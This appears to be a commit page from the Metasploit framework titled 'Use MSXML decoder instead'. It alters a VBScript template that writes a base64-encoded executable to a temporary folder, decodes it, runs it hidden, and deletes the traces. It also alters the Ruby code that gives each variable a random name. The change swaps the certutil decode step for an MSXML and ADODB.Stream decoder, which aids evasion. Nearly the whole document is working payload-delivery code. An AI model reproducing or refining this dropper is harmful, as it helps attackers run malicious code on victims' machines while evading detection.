Use MSXML decoder instead
parent
19bd7b98f4
commit
629bc00696
|
@ -1,27 +1,34 @@
|
|||
Function %{var_decodefunc}(%{var_decodebase64})
|
||||
%{var_xml} = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
|
||||
"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
|
||||
%{var_decodebase64} & "</B64DECODE>"
|
||||
Set %{var_xmldoc} = CreateObject("MSXML2.DOMDocument.3.0")
|
||||
%{var_xmldoc}.LoadXML(%{var_xml})
|
||||
%{var_decodefunc} = %{var_xmldoc}.selectsinglenode("B64DECODE").nodeTypedValue
|
||||
set %{var_xmldoc} = nothing
|
||||
End Function
|
||||
|
||||
Function %{var_func}()
|
||||
%{var_shellcode} = "%{base64_shellcode}"
|
||||
|
||||
Dim %{var_obj}
|
||||
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
|
||||
Dim %{var_stream}
|
||||
Dim %{var_tempdir}
|
||||
Dim %{var_tempbase64}
|
||||
Dim %{var_basedir}
|
||||
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
|
||||
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
|
||||
%{var_obj}.CreateFolder(%{var_basedir})
|
||||
%{var_tempbase64} = %{var_basedir} & "\" & "%{base64_filename}"
|
||||
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
|
||||
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempbase64}, true , false)
|
||||
%{var_stream}.Write %{var_shellcode}
|
||||
%{var_stream}.Close
|
||||
Dim %{var_shell}
|
||||
Set %{var_shell} = CreateObject("Wscript.Shell")
|
||||
%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
|
||||
%{var_decoded} = %{var_decodefunc}(%{var_shellcode})
|
||||
Set %{var_adodbstream} = CreateObject("ADODB.Stream")
|
||||
%{var_adodbstream}.Type = 1
|
||||
%{var_adodbstream}.Open
|
||||
%{var_adodbstream}.Write %{var_decoded}
|
||||
%{var_adodbstream}.SaveToFile %{var_tempexe}, 2
|
||||
%{var_shell}.run %{var_tempexe}, 0, true
|
||||
%{var_obj}.DeleteFile(%{var_tempexe})
|
||||
%{var_obj}.DeleteFile(%{var_tempbase64})
|
||||
%{var_obj}.DeleteFolder(%{var_basedir})
|
||||
End Function
|
||||
|
||||
%{init}
|
||||
%{init}
|
||||
|
|
|
@ -1247,16 +1247,18 @@ require 'msf/core/exe/segment_appender'
|
|||
hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_tempbase64] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
|
||||
hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
|
||||
|
||||
hash_sub[:var_decodefunc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_xml] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_xmldoc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_decoded] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_adodbstream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_decodebase64] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:init] = ""
|
||||
|
||||
if persist
|
||||
|
|
Loading…
Reference in New Issue